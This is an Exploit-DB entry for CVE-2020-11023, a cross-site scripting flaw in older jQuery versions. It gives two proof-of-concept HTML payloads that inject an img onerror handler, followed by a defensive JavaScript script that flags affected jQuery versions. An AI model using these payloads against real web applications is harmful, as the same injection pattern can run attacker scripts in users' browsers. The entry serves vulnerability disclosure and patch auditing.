jQuery 1.0.3 – Cross-Site Scripting (XSS)

  • Author: Central InfoSec
    Date: 2021-04-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49767/
  • # Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS)
    # Date: 04/29/2020
    # Exploit Author: Central InfoSec
    # Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
    # CVE : CVE-2020-11023
    
    # Proof of Concept 1:
    <style><style /><img src=x onerror=alert(1)>
    
    # Proof of Concept 2 (Only jQuery 3.x affected):
    <img alt="<x" title="/><img src=x onerror=alert(1)>">
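
An inventory check for the affected range given in the Version line above (an added example, not part of the original exploit entry): it extracts a jQuery version from a file banner, file name or script URL, reports whether it falls in >= 1.0.3 and < 3.5.0, and lists which of the two proofs of concept the entry marks as applicable. The banner and file-name patterns, the function names and the sample strings are assumptions constructed for illustration.

```javascript
// Added example: flag jQuery builds in the range the entry gives
// (>= 1.0.3 and < 3.5.0). Banner and file-name patterns are assumptions.

const LOWER = [1, 0, 3]; // first affected version, from the entry
const FIXED = [3, 5, 0]; // first version outside the affected range

// Patterns tried in order; each captures a dotted version string.
const PATTERNS = [
  /jQuery (?:JavaScript Library )?v?(\d+(?:\.\d+){1,2})/i,   // file banner
  /jquery[-.](\d+(?:\.\d+){1,2})(?:[.-](?:min|slim))*\.js/i, // file name or URL
];

function parseVersion(s) {
  const parts = s.split(".").map(Number);
  while (parts.length < 3) parts.push(0); // "1.1" is treated as 1.1.0
  return parts;
}

function compare(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

function assess(text) {
  for (const re of PATTERNS) {
    const m = re.exec(text);
    if (!m) continue;
    const v = parseVersion(m[1]);
    const affected = compare(v, LOWER) >= 0 && compare(v, FIXED) < 0;
    // Proof of Concept 2 is listed as affecting jQuery 3.x only.
    const pocs = !affected ? [] : v[0] === 3 ? [1, 2] : [1];
    return { version: v.join("."), affected, pocs };
  }
  return { version: null, affected: false, pocs: [] };
}

// Constructed sample inputs (not taken from any real site).
const SAMPLES = [
  "/*! jQuery v3.4.1 | (c) JS Foundation and other contributors */",
  " * jQuery JavaScript Library v1.12.4",
  '<script src="/static/js/jquery-2.2.4.min.js"></script>',
  "/*! jQuery v3.5.0 | (c) JS Foundation and other contributors */",
  "https://cdn.example.test/jquery-1.0.2.js",
];

for (const s of SAMPLES) console.log(JSON.stringify(assess(s)), "<-", s);
```

A version that is not detected is reported as unaffected with `version: null`, so treat a null result as "unknown" and inspect the file by hand.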